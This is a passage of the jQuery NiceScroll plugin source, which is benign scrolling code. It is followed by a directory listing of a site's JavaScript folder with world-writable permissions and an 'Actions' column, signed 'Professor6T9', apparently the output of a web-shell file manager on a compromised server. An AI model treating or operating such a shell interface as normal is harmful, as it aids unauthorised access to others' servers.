'' : d[2]);       }       self.saved = false;             self.me.data('__nicescroll',''); //erase all traces 	  self.me = null; 	  self.doc = null; 	  self.docscroll = null; 	  self.win = null;       return self;     };          this.scrollstart = function(fn) {       this.onscrollstart = fn;       return self;     }     this.scrollend = function(fn) {       this.onscrollend = fn;       return self;     }     this.scrollcancel = function(fn) {       this.onscrollcancel = fn;       return self;     }          this.zoomin = function(fn) {       this.onzoomin = fn;       return self;     }     this.zoomout = function(fn) {       this.onzoomout = fn;       return self;     }          this.isScrollable = function(e) {             var dom = (e.target) ? e.target : e;       if (dom.nodeName == 'OPTION') return true;       while (dom&&(dom.nodeType==1)&&!(/BODY|HTML/.test(dom.nodeName))) {         var dd = $(dom);         var ov = dd.css('overflowY')||dd.css('overflowX')||dd.css('overflow')||'';         if (/scroll|auto/.test(ov)) return (dom.clientHeight!=dom.scrollHeight);         dom = (dom.parentNode) ? dom.parentNode : false;               }       return false;     };      this.getViewport = function(me) {             var dom = (me&&me.parentNode) ? me.parentNode : false;       while (dom&&(dom.nodeType==1)&&!(/BODY|HTML/.test(dom.nodeName))) {         var dd = $(dom);         var ov = dd.css('overflowY')||dd.css('overflowX')||dd.css('overflow')||'';         if ((/scroll|auto/.test(ov))&&(dom.clientHeight!=dom.scrollHeight)) return dd;         if (dd.getNiceScroll().length>0) return dd;         dom = (dom.parentNode) ? dom.parentNode : false;       }       return false;     };          function execScrollWheel(e,hr,chkscroll) {       var px,py;       var rt = 1;        if (e.deltaMode==0) {  // PIXEL         px = -Math.floor(e.deltaX*(self.opt.mousescrollstep/(18*3)));         py = -Math.floor(e.deltaY*(self.opt.mousescrollstep/(18*3)));       }       else if (e.deltaMode==1) {  // LINE         px = -Math.floor(e.deltaX*self.opt.mousescrollstep);         py = -Math.floor(e.deltaY*self.opt.mousescrollstep);       }              if (hr&&(px==0)&&py) {  // classic vertical-only mousewheel + browser with x/y support          px = py;         py = 0;       }        if (px) {         if (self.scrollmom) {self.scrollmom.stop()}         self.lastdeltax+=px;         self.debounced("mousewheelx",function(){var dt=self.lastdeltax;self.lastdeltax=0;if(!self.rail.drag){self.doScrollLeftBy(dt)}},120);       }       if (py) {         if (self.opt.nativeparentscrolling&&chkscroll&&!self.ispage&&!self.zoomactive) {           if (py<0) {             if (self.getScrollTop()>=self.page.maxh) return true;           } else {             if (self.getScrollTop()<=0) return true;           }         }         if (self.scrollmom) {self.scrollmom.stop()}         self.lastdeltay+=py;         self.debounced("mousewheely",function(){var dt=self.lastdeltay;self.lastdeltay=0;if(!self.rail.drag){self.doScrollBy(dt)}},120);       }              e.stopImmediatePropagation();       return e.preventDefault(); //      return self.cancelEvent(e);     };          this.onmousewheel = function(e) {       if (self.locked) return true;       if (self.rail.drag) return self.cancelEvent(e);              if (!self.rail.scrollable) {         if (self.railh&&self.railh.scrollable) {           return self.onmousewheelhr(e);         } else {           return true;         }       }              var nw = +(new Date());       var chk = false;       if (self.opt.preservenativescrolling&&((self.checkarea+600)<nw)) { //        self.checkarea = false;         self.nativescrollingarea = self.isScrollable(e);         chk = true;       }       self.checkarea = nw;       if (self.nativescrollingarea) return true; // this isn't my business //      if (self.locked) return self.cancelEvent(e);       var ret = execScrollWheel(e,false,chk);       if (ret) self.checkarea = 0;       return ret;     };      this.onmousewheelhr = function(e) {       if (self.locked||!self.railh.scrollable) return true;       if (self.rail.drag) return self.cancelEvent(e);              var nw = +(new Date());       var chk = false;       if (self.opt.preservenativescrolling&&((self.checkarea+600)<nw)) { //        self.checkarea = false;         self.nativescrollingarea = self.isScrollable(e);          chk = true;       }       self.checkarea = nw;       if (self.nativescrollingarea) return true; // this isn't my business       if (self.locked) return self.cancelEvent(e);        return execScrollWheel(e,true,chk);     };          this.stop = function() {       self.cancelScroll();       if (self.scrollmon) self.scrollmon.stop();       self.cursorfreezed = false;       self.scroll.y = Math.round(self.getScrollTop() * (1/self.scrollratio.y));             self.noticeCursor();       return self;     };          this.getTransitionSpeed = function(dif) {       var sp = Math.round(self.opt.scrollspeed*10);       var ex = Math.min(sp,Math.round((dif / 20) * self.opt.scrollspeed));       return (ex>20) ? ex : 0;     }          if (!self.opt.smoothscroll) {       this.doScrollLeft = function(x,spd) {  //direct         var y = self.getScrollTop();         self.doScrollPos(x,y,spd);       }             this.doScrollTop = function(y,spd) {   //direct         var x = self.getScrollLeft();         self.doScrollPos(x,y,spd);       }       this.doScrollPos = function(x,y,spd) {  //direct         var nx = (x>self.page.maxw) ? self.page.maxw : x;         if (nx<0) nx=0;         var ny = (y>self.page.maxh) ? self.page.maxh : y;         if (ny<0) ny=0;         self.synched('scroll',function(){           self.setScrollTop(ny);           self.setScrollLeft(nx);         });       }       this.cancelScroll = function() {}; // direct     }      else if (self.ishwscroll&&cap.hastransition&&self.opt.usetransition) {       this.prepareTransition = function(dif,istime) {         var ex = (istime) ? ((dif>20)?dif:0) : self.getTransitionSpeed(dif);                 var trans = (ex) ? cap.prefixstyle+'transform '+ex+'ms ease-out' : '';         if (!self.lasttransitionstyle||self.lasttransitionstyle!=trans) {           self.lasttransitionstyle = trans;           self.doc.css(cap.transitionstyle,trans);         }         return ex;       };              this.doScrollLeft = function(x,spd) {  //trans         var y = (self.scrollrunning) ? self.newscrolly : self.getScrollTop();         self.doScrollPos(x,y,spd);       }                    this.doScrollTop = function(y,spd) {   //trans         var x = (self.scrollrunning) ? self.newscrollx : self.getScrollLeft();         self.doScrollPos(x,y,spd);       }              this.doScrollPos = function(x,y,spd) {  //trans             var py = self.getScrollTop();         var px = self.getScrollLeft();                        if (((self.newscrolly-py)*(y-py)<0)||((self.newscrollx-px)*(x-px)<0)) self.cancelScroll();  //inverted movement detection                        if (self.opt.bouncescroll==false) {           if (y<0) y=0;           else if (y>self.page.maxh) y=self.page.maxh;           if (x<0) x=0;           else if (x>self.page.maxw) x=self.page.maxw;         }                  if (self.scrollrunning&&x==self.newscrollx&&y==self.newscrolly) return false;                  self.newscrolly = y;         self.newscrollx = x;                  self.newscrollspeed = spd||false;                  if (self.timer) return false;                  self.timer = setTimeout(function(){                    var top = self.getScrollTop();           var lft = self.getScrollLeft();                      var dst = {};           dst.x = x-lft;           dst.y = y-top;           dst.px = lft;           dst.py = top;                      var dd = Math.round(Math.sqrt(Math.pow(dst.x,2)+Math.pow(dst.y,2)));                      //          var df = (self.newscrollspeed) ? self.newscrollspeed : dd;                      var ms = (self.newscrollspeed && self.newscrollspeed>1) ? self.newscrollspeed : self.getTransitionSpeed(dd);           if (self.newscrollspeed&&self.newscrollspeed<=1) ms*=self.newscrollspeed;                      self.prepareTransition(ms,true);                      if (self.timerscroll&&self.timerscroll.tm) clearInterval(self.timerscroll.tm);                          if (ms>0) {                        if (!self.scrollrunning&&self.onscrollstart) {               var info = {"type":"scrollstart","current":{"x":lft,"y":top},"request":{"x":x,"y":y},"end":{"x":self.newscrollx,"y":self.newscrolly},"speed":ms};               self.onscrollstart.call(self,info);             }                          if (cap.transitionend) {               if (!self.scrollendtrapped) {                 self.scrollendtrapped = true;                 self.bind(self.doc,cap.transitionend,self.onScrollEnd,false); //I have got to do something usefull!!               }             } else {                             if (self.scrollendtrapped) clearTimeout(self.scrollendtrapped);               self.scrollendtrapped = setTimeout(self.onScrollEnd,ms);  // simulate transitionend event             }                          var py = top;             var px = lft;             self.timerscroll = {               bz: new BezierClass(py,self.newscrolly,ms,0,0,0.58,1),               bh: new BezierClass(px,self.newscrollx,ms,0,0,0.58,1)             };                         if (!self.cursorfreezed) self.timerscroll.tm=setInterval(function(){self.showCursor(self.getScrollTop(),self.getScrollLeft())},60);                        }                      self.synched("doScroll-set",function(){             self.timer = 0;             if (self.scrollendtrapped) self.scrollrunning = true;             self.setScrollTop(self.newscrolly);             self.setScrollLeft(self.newscrollx);             if (!self.scrollendtrapped) self.onScrollEnd();           });                               },50);                };              this.cancelScroll = function() {         if (!self.scrollendtrapped) return true;                 var py = self.getScrollTop();         var px = self.getScrollLeft();         self.scrollrunning = false;         if (!cap.transitionend) clearTimeout(cap.transitionend);         self.scrollendtrapped = false;         self._unbind(self.doc,cap.transitionend,self.onScrollEnd);                 self.prepareTransition(0);         self.setScrollTop(py); // fire event onscroll         if (self.railh) self.setScrollLeft(px);         if (self.timerscroll&&self.timerscroll.tm) clearInterval(self.timerscroll.tm);         self.timerscroll = false;                  self.cursorfreezed = false;          //self.noticeCursor(false,py,px);         self.showCursor(py,px);         return self;       };       this.onScrollEnd = function() {                         if (self.scrollendtrapped) self._unbind(self.doc,cap.transitionend,self.onScrollEnd);         self.scrollendtrapped = false;                 self.prepareTransition(0);         if (self.timerscroll&&self.timerscroll.tm) clearInterval(self.timerscroll.tm);         self.timerscroll = false;                 var py = self.getScrollTop();         var px = self.getScrollLeft();         self.setScrollTop(py);  // fire event onscroll                 if (self.railh) self.setScrollLeft(px);  // fire event onscroll left                  self.noticeCursor(false,py,px);                       self.cursorfreezed = false;                  if (py<0) py=0         else if (py>self.page.maxh) py=self.page.maxh;         if (px<0) px=0         else if (px>self.page.maxw) px=self.page.maxw;         if((py!=self.newscrolly)||(px!=self.newscrollx)) return self.doScrollPos(px,py,self.opt.snapbackspeed);                  if (self.onscrollend&&self.scrollrunning) {           var info = {"type":"scrollend","current":{"x":px,"y":py},"end":{"x":self.newscrollx,"y":self.newscrolly}};           self.onscrollend.call(self,info);         }          self.scrollrunning = false;                };      } else {        this.doScrollLeft = function(x,spd) {  //no-trans         var y = (self.scrollrunning) ? self.newscrolly : self.getScrollTop();         self.doScrollPos(x,y,spd);       }        this.doScrollTop = function(y,spd) {  //no-trans         var x = (self.scrollrunning) ? self.newscrollx : self.getScrollLeft();         self.doScrollPos(x,y,spd);       }        this.doScrollPos = function(x,y,spd) {  //no-trans         var y = ((typeof y == "undefined")||(y===false)) ? self.getScrollTop(true) : y;                if  ((self.timer)&&(self.newscrolly==y)&&(self.newscrollx==x)) return true;                if (self.timer) clearAnimationFrame(self.timer);         self.timer = 0;                var py = self.getScrollTop();         var px = self.getScrollLeft();                  if (((self.newscrolly-py)*(y-py)<0)||((self.newscrollx-px)*(x-px)<0)) self.cancelScroll();  //inverted movement detection                  self.newscrolly = y;         self.newscrollx = x;                  if (!self.bouncescroll||!self.rail.visibility) {           if (self.newscrolly<0) {             self.newscrolly = 0;           }           else if (self.newscrolly>self.page.maxh) {             self.newscrolly = self.page.maxh;           }         }         if (!self.bouncescroll||!self.railh.visibility) {           if (self.newscrollx<0) {             self.newscrollx = 0;           }           else if (self.newscrollx>self.page.maxw) {             self.newscrollx = self.page.maxw;           }         }          self.dst = {};         self.dst.x = x-px;         self.dst.y = y-py;         self.dst.px = px;         self.dst.py = py;                  var dst = Math.round(Math.sqrt(Math.pow(self.dst.x,2)+Math.pow(self.dst.y,2)));                  self.dst.ax = self.dst.x / dst;         self.dst.ay = self.dst.y / dst;                  var pa = 0;         var pe = dst;                  if (self.dst.x==0) {           pa = py;           pe = y;           self.dst.ay = 1;           self.dst.py = 0;         } else if (self.dst.y==0) {           pa = px;           pe = x;           self.dst.ax = 1;           self.dst.px = 0;         }          var ms = self.getTransitionSpeed(dst);         if (spd&&spd<=1) ms*=spd;         if (ms>0) {           self.bzscroll = (self.bzscroll) ? self.bzscroll.update(pe,ms) : new BezierClass(pa,pe,ms,0,1,0,1);         } else {           self.bzscroll = false;         }                  if (self.timer) return;                  if ((py==self.page.maxh&&y>=self.page.maxh)||(px==self.page.maxw&&x>=self.page.maxw)) self.checkContentSize();                  var sync = 1;                  function scrolling() {                     if (self.cancelAnimationFrame) return true;                      self.scrollrunning = true;                      sync = 1-sync;           if (sync) return (self.timer = setAnimationFrame(scrolling)||1);            var done = 0;                      var sc = sy = self.getScrollTop();           if (self.dst.ay) {                         sc = (self.bzscroll) ? self.dst.py + (self.bzscroll.getNow()*self.dst.ay) : self.newscrolly;             var dr=sc-sy;                       if ((dr<0&&sc<self.newscrolly)||(dr>0&&sc>self.newscrolly)) sc = self.newscrolly;             self.setScrollTop(sc);             if (sc == self.newscrolly) done=1;           } else {             done=1;           }                      var scx = sx = self.getScrollLeft();           if (self.dst.ax) {                         scx = (self.bzscroll) ? self.dst.px + (self.bzscroll.getNow()*self.dst.ax) : self.newscrollx;                         var dr=scx-sx;             if ((dr<0&&scx<self.newscrollx)||(dr>0&&scx>self.newscrollx)) scx = self.newscrollx;             self.setScrollLeft(scx);             if (scx == self.newscrollx) done+=1;           } else {             done+=1;           }                      if (done==2) {             self.timer = 0;             self.cursorfreezed = false;             self.bzscroll = false;             self.scrollrunning = false;             if (sc<0) sc=0;             else if (sc>self.page.maxh) sc=self.page.maxh;             if (scx<0) scx=0;             else if (scx>self.page.maxw) scx=self.page.maxw;             if ((scx!=self.newscrollx)||(sc!=self.newscrolly)) self.doScrollPos(scx,sc);             else {               if (self.onscrollend) {                 var info = {"type":"scrollend","current":{"x":sx,"y":sy},"end":{"x":self.newscrollx,"y":self.newscrolly}};                 self.onscrollend.call(self,info);               }                          }            } else {             self.timer = setAnimationFrame(scrolling)||1;           }         };         self.cancelAnimationFrame=false;         self.timer = 1;          if (self.onscrollstart&&!self.scrollrunning) {           var info = {"type":"scrollstart","current":{"x":px,"y":py},"request":{"x":x,"y":y},"end":{"x":self.newscrollx,"y":self.newscrolly},"speed":ms};           self.onscrollstart.call(self,info);         }                  scrolling();                  if ((py==self.page.maxh&&y>=py)||(px==self.page.maxw&&x>=px)) self.checkContentSize();                  self.noticeCursor();       };          this.cancelScroll = function() {                 if (self.timer) clearAnimationFrame(self.timer);         self.timer = 0;         self.bzscroll = false;         self.scrollrunning = false;         return self;       };            }          this.doScrollBy = function(stp,relative) {       var ny = 0;       if (relative) {         ny = Math.floor((self.scroll.y-stp)*self.scrollratio.y)       } else {                 var sy = (self.timer) ? self.newscrolly : self.getScrollTop(true);         ny = sy-stp;       }       if (self.bouncescroll) {         var haf = Math.round(self.view.h/2);         if (ny<-haf) ny=-haf         else if (ny>(self.page.maxh+haf)) ny = (self.page.maxh+haf);       }       self.cursorfreezed = false;              py = self.getScrollTop(true);       if (ny<0&&py<=0) return self.noticeCursor();             else if (ny>self.page.maxh&&py>=self.page.maxh) {         self.checkContentSize();         return self.noticeCursor();       }              self.doScrollTop(ny);     };      this.doScrollLeftBy = function(stp,relative) {       var nx = 0;       if (relative) {         nx = Math.floor((self.scroll.x-stp)*self.scrollratio.x)       } else {         var sx = (self.timer) ? self.newscrollx : self.getScrollLeft(true);         nx = sx-stp;       }       if (self.bouncescroll) {         var haf = Math.round(self.view.w/2);         if (nx<-haf) nx=-haf         else if (nx>(self.page.maxw+haf)) nx = (self.page.maxw+haf);       }       self.cursorfreezed = false;            px = self.getScrollLeft(true);       if (nx<0&&px<=0) return self.noticeCursor();             else if (nx>self.page.maxw&&px>=self.page.maxw) return self.noticeCursor();              self.doScrollLeft(nx);     };          this.doScrollTo = function(pos,relative) {       var ny = (relative) ? Math.round(pos*self.scrollratio.y) : pos;       if (ny<0) ny=0       else if (ny>self.page.maxh) ny = self.page.maxh;       self.cursorfreezed = false;       self.doScrollTop(pos);     };          this.checkContentSize = function() {             var pg = self.getContentSize();       if ((pg.h!=self.page.h)||(pg.w!=self.page.w)) self.resize(false,pg);     };          self.onscroll = function(e) {           if (self.rail.drag) return;       if (!self.cursorfreezed) {         self.synched('scroll',function(){           self.scroll.y = Math.round(self.getScrollTop() * (1/self.scrollratio.y));           if (self.railh) self.scroll.x = Math.round(self.getScrollLeft() * (1/self.scrollratio.x));           self.noticeCursor();         });       }     };     self.bind(self.docscroll,"scroll",self.onscroll);          this.doZoomIn = function(e) {       if (self.zoomactive) return;       self.zoomactive = true;              self.zoomrestore = {         style:{}       };       var lst = ['position','top','left','zIndex','backgroundColor','marginTop','marginBottom','marginLeft','marginRight'];       var win = self.win[0].style;       for(var a in lst) {         var pp = lst[a];         self.zoomrestore.style[pp] = (typeof win[pp] != "undefined") ? win[pp] : '';               }              self.zoomrestore.style.width = self.win.css('width');       self.zoomrestore.style.height = self.win.css('height');              self.zoomrestore.padding = {         w:self.win.outerWidth()-self.win.width(),         h:self.win.outerHeight()-self.win.height()       };              if (cap.isios4) {         self.zoomrestore.scrollTop = $(window).scrollTop();         $(window).scrollTop(0);       }              self.win.css({         "position":(cap.isios4)?"absolute":"fixed",         "top":0,         "left":0,         "z-index":globalmaxzindex+100,         "margin":"0px"       });       var bkg = self.win.css("backgroundColor");             if (bkg==""||/transparent|rgba\(0, 0, 0, 0\)|rgba\(0,0,0,0\)/.test(bkg)) self.win.css("backgroundColor","#fff");       self.rail.css({"z-index":globalmaxzindex+101});       self.zoom.css({"z-index":globalmaxzindex+102});             self.zoom.css('backgroundPosition','0px -18px');       self.resizeZoom();              if (self.onzoomin) self.onzoomin.call(self);              return self.cancelEvent(e);     };      this.doZoomOut = function(e) {       if (!self.zoomactive) return;       self.zoomactive = false;              self.win.css("margin","");       self.win.css(self.zoomrestore.style);              if (cap.isios4) {         $(window).scrollTop(self.zoomrestore.scrollTop);       }              self.rail.css({"z-index":self.zindex});       self.zoom.css({"z-index":self.zindex});       self.zoomrestore = false;       self.zoom.css('backgroundPosition','0px 0px');       self.onResize();              if (self.onzoomout) self.onzoomout.call(self);              return self.cancelEvent(e);     };          this.doZoom = function(e) {       return (self.zoomactive) ? self.doZoomOut(e) : self.doZoomIn(e);     };          this.resizeZoom = function() {       if (!self.zoomactive) return;        var py = self.getScrollTop(); //preserve scrolling position       self.win.css({         width:$(window).width()-self.zoomrestore.padding.w+"px",         height:$(window).height()-self.zoomrestore.padding.h+"px"       });       self.onResize();              self.setScrollTop(Math.min(self.page.maxh,py));     };         this.init();          $.nicescroll.push(this);    };    // Inspired by the work of Kin Blas // http://webpro.host.adobe.com/people/jblas/momentum/includes/jquery.momentum.0.7.js           var ScrollMomentumClass2D = function(nc) {     var self = this;     this.nc = nc;          this.lastx = 0;     this.lasty = 0;     this.speedx = 0;     this.speedy = 0;     this.lasttime = 0;     this.steptime = 0;     this.snapx = false;     this.snapy = false;     this.demulx = 0;     this.demuly = 0;          this.lastscrollx = -1;     this.lastscrolly = -1;          this.chkx = 0;     this.chky = 0;          this.timer = 0;          this.time = function() {       return +new Date();//beautifull hack     };          this.reset = function(px,py) {       self.stop();       var now = self.time();       self.steptime = 0;       self.lasttime = now;       self.speedx = 0;       self.speedy = 0;       self.lastx = px;       self.lasty = py;       self.lastscrollx = -1;       self.lastscrolly = -1;     };          this.update = function(px,py) {       var now = self.time();       self.steptime = now - self.lasttime;       self.lasttime = now;             var dy = py - self.lasty;       var dx = px - self.lastx;       var sy = self.nc.getScrollTop();       var sx = self.nc.getScrollLeft();       var newy = sy + dy;       var newx = sx + dx;       self.snapx = (newx<0)||(newx>self.nc.page.maxw);       self.snapy = (newy<0)||(newy>self.nc.page.maxh);       self.speedx = dx;       self.speedy = dy;       self.lastx = px;       self.lasty = py;     };          this.stop = function() {       self.nc.unsynched("domomentum2d");       if (self.timer) clearTimeout(self.timer);       self.timer = 0;       self.lastscrollx = -1;       self.lastscrolly = -1;     };          this.doSnapy = function(nx,ny) {       var snap = false;              if (ny<0) {         ny=0;         snap=true;               }        else if (ny>self.nc.page.maxh) {         ny=self.nc.page.maxh;         snap=true;       }        if (nx<0) {         nx=0;         snap=true;               }        else if (nx>self.nc.page.maxw) {         nx=self.nc.page.maxw;         snap=true;       }              if (snap) self.nc.doScrollPos(nx,ny,self.nc.opt.snapbackspeed);     };          this.doMomentum = function(gp) {       var t = self.time();       var l = (gp) ? t+gp : self.lasttime;        var sl = self.nc.getScrollLeft();       var st = self.nc.getScrollTop();              var pageh = self.nc.page.maxh;       var pagew = self.nc.page.maxw;              self.speedx = (pagew>0) ? Math.min(60,self.speedx) : 0;       self.speedy = (pageh>0) ? Math.min(60,self.speedy) : 0;              var chk = l && (t - l) <= 50;              if ((st<0)||(st>pageh)||(sl<0)||(sl>pagew)) chk = false;              var sy = (self.speedy && chk) ? self.speedy : false;       var sx = (self.speedx && chk) ? self.speedx : false;              if (sy||sx) {         var tm = Math.max(16,self.steptime); //timeout granularity                  if (tm>50) {  // do smooth           var xm = tm/50;           self.speedx*=xm;           self.speedy*=xm;           tm = 50;         }                  self.demulxy = 0;          self.lastscrollx = self.nc.getScrollLeft();         self.chkx = self.lastscrollx;         self.lastscrolly = self.nc.getScrollTop();         self.chky = self.lastscrolly;                  var nx = self.lastscrollx;         var ny = self.lastscrolly;                  var onscroll = function(){           var df = ((self.time()-t)>600) ? 0.04 : 0.02;                    if (self.speedx) {             nx = Math.floor(self.lastscrollx - (self.speedx*(1-self.demulxy)));             self.lastscrollx = nx;             if ((nx<0)||(nx>pagew)) df=0.10;           }            if (self.speedy) {             ny = Math.floor(self.lastscrolly - (self.speedy*(1-self.demulxy)));             self.lastscrolly = ny;             if ((ny<0)||(ny>pageh)) df=0.10;           }                      self.demulxy = Math.min(1,self.demulxy+df);                      self.nc.synched("domomentum2d",function(){              if (self.speedx) {               var scx = self.nc.getScrollLeft();               if (scx!=self.chkx) self.stop();               self.chkx=nx;               self.nc.setScrollLeft(nx);             }                        if (self.speedy) {               var scy = self.nc.getScrollTop();               if (scy!=self.chky) self.stop();                         self.chky=ny;               self.nc.setScrollTop(ny);             }                          if(!self.timer) {               self.nc.hideCursor();               self.doSnapy(nx,ny);             }                        });                      if (self.demulxy<1) {                         self.timer = setTimeout(onscroll,tm);           } else {             self.stop();             self.nc.hideCursor();             self.doSnapy(nx,ny);           }         };                  onscroll();                } else {         self.doSnapy(self.nc.getScrollLeft(),self.nc.getScrollTop());       }                  }        };     // override jQuery scrollTop     var _scrollTop = jQuery.fn.scrollTop; // preserve original function       jQuery.cssHooks["pageYOffset"] = {     get: function(elem,computed,extra) {             var nice = $.data(elem,'__nicescroll')||false;       return (nice&&nice.ishwscroll) ? nice.getScrollTop() : _scrollTop.call(elem);     },     set: function(elem,value) {       var nice = $.data(elem,'__nicescroll')||false;           (nice&&nice.ishwscroll) ? nice.setScrollTop(parseInt(value)) : _scrollTop.call(elem,value);       return this;     }   };    /*     $.fx.step["scrollTop"] = function(fx){         $.cssHooks["scrollTop"].set( fx.elem, fx.now + fx.unit );   }; */        jQuery.fn.scrollTop = function(value) {         if (typeof value == "undefined") {       var nice = (this[0]) ? $.data(this[0],'__nicescroll')||false : false;       return (nice&&nice.ishwscroll) ? nice.getScrollTop() : _scrollTop.call(this);     } else {             return this.each(function() {         var nice = $.data(this,'__nicescroll')||false;         (nice&&nice.ishwscroll) ? nice.setScrollTop(parseInt(value)) : _scrollTop.call($(this),value);       });     }   }  // override jQuery scrollLeft     var _scrollLeft = jQuery.fn.scrollLeft; // preserve original function       $.cssHooks.pageXOffset = {     get: function(elem,computed,extra) {       var nice = $.data(elem,'__nicescroll')||false;       return (nice&&nice.ishwscroll) ? nice.getScrollLeft() : _scrollLeft.call(elem);     },     set: function(elem,value) {       var nice = $.data(elem,'__nicescroll')||false;           (nice&&nice.ishwscroll) ? nice.setScrollLeft(parseInt(value)) : _scrollLeft.call(elem,value);       return this;     }   };    /*     $.fx.step["scrollLeft"] = function(fx){     $.cssHooks["scrollLeft"].set( fx.elem, fx.now + fx.unit );   };   */       jQuery.fn.scrollLeft = function(value) {         if (typeof value == "undefined") {       var nice = (this[0]) ? $.data(this[0],'__nicescroll')||false : false;       return (nice&&nice.ishwscroll) ? nice.getScrollLeft() : _scrollLeft.call(this);     } else {       return this.each(function() {              var nice = $.data(this,'__nicescroll')||false;         (nice&&nice.ishwscroll) ? nice.setScrollLeft(parseInt(value)) : _scrollLeft.call($(this),value);       });     }   }      var NiceScrollArray = function(doms) {     var self = this;     this.length = 0;     this.name = "nicescrollarray";        this.each = function(fn) {       for(var a=0;a<self.length;a++) fn.call(self[a]);       return self;     };          this.push = function(nice) {       self[self.length]=nice;       self.length++;     };          this.eq = function(idx) {       return self[idx];     };          if (doms) {       for(a=0;a<doms.length;a++) {         var nice = $.data(doms[a],'__nicescroll')||false;         if (nice) {           this[this.length]=nice;           this.length++;         }       };     }          return this;   };      function mplex(el,lst,fn) {     for(var a=0;a<lst.length;a++) fn(el,lst[a]);   };     mplex(     NiceScrollArray.prototype,     ['show','hide','toggle','onResize','resize','remove','stop','doScrollPos'],     function(e,n) {       e[n] = function(){         var args = arguments;         return this.each(function(){                     this[n].apply(this,args);         });       };     }   );        jQuery.fn.getNiceScroll = function(index) {     if (typeof index == "undefined") {       return new NiceScrollArray(this);     } else {       var nice = $.data(this[index],'__nicescroll')||false;       return nice;     }   };      jQuery.extend(jQuery.expr[':'], {     nicescroll: function(a) {       return ($.data(a,'__nicescroll'))?true:false;     }   });        $.fn.niceScroll = function(wrapper,opt) {             if (typeof opt=="undefined") {       if ((typeof wrapper=="object")&&!("jquery" in wrapper)) {         opt = wrapper;         wrapper = false;               }     }     var ret = new NiceScrollArray();     if (typeof opt=="undefined") opt = {};          if (wrapper||false) {             opt.doc = $(wrapper);       opt.win = $(this);     }         var docundef = !("doc" in opt);        if (!docundef&&!("win" in opt)) opt.win = $(this);              this.each(function() {       var nice = $(this).data('__nicescroll')||false;       if (!nice) {         opt.doc = (docundef) ? $(this) : opt.doc;         nice = new NiceScrollClass(opt,$(this));                 $(this).data('__nicescroll',nice);       }       ret.push(nice);     });     return (ret.length==1) ? ret[0] : ret;   };      window.NiceScroll = {     getjQuery:function(){return jQuery}   };      if (!$.nicescroll) {    $.nicescroll = new NiceScrollArray();    $.nicescroll.options = _globaloptions;   }    })( jQuery );

Name	Type	Size	Owner/Group	Permission	Last Modified	Actions
.	dir	-	0/0	0777	2024-07-31 04:17:28
..	dir	-	0/0	0777	2025-07-24 01:07:01
carousels.js	text/html	1.53 KB	0/0	0666	2024-10-28 03:01:15
classie.js	text/html	2.42 KB	0/0	0666	2024-10-28 03:01:15
headhesive.min.js	text/html	3.06 KB	0/0	0666	2024-10-28 03:01:15
jquery-1.10.2.min.js	text/html	91.48 KB	0/0	0666	2024-10-28 03:01:15
jquery.js	text/html	91.47 KB	0/0	0666	2024-10-28 03:01:15
jquery.magnific-popup.js	text/html	47.34 KB	0/0	0666	2024-10-28 03:01:15
jquery.mixitup.js	text/html	37.26 KB	0/0	0666	2024-10-28 03:01:15
jquery.nicescroll.js	text/html	109.71 KB	0/0	0666	2024-10-28 03:01:15
jquery.stellar.js	text/html	23.08 KB	0/0	0666	2024-10-28 03:01:15
modernizr.js	text/html	8.85 KB	0/0	0666	2024-10-28 03:01:15
normal.js	text/html	76.57 KB	0/0	0666	2024-10-28 03:01:15
rotating-text.js	text/html	1.47 KB	0/0	0666	2024-10-28 03:01:15
scripts.js	text/html	2.51 KB	0/0	0666	2024-10-28 03:01:15
testimonials.js	text/html	4.39 KB	0/0	0666	2024-10-28 03:01:15
tooltip.js	text/html	427.12 KB	0/0	0666	2024-10-28 03:01:15
waypoints.min.js	text/html	8.4 KB	0/0	0666	2024-10-28 03:01:15

© Professor6T9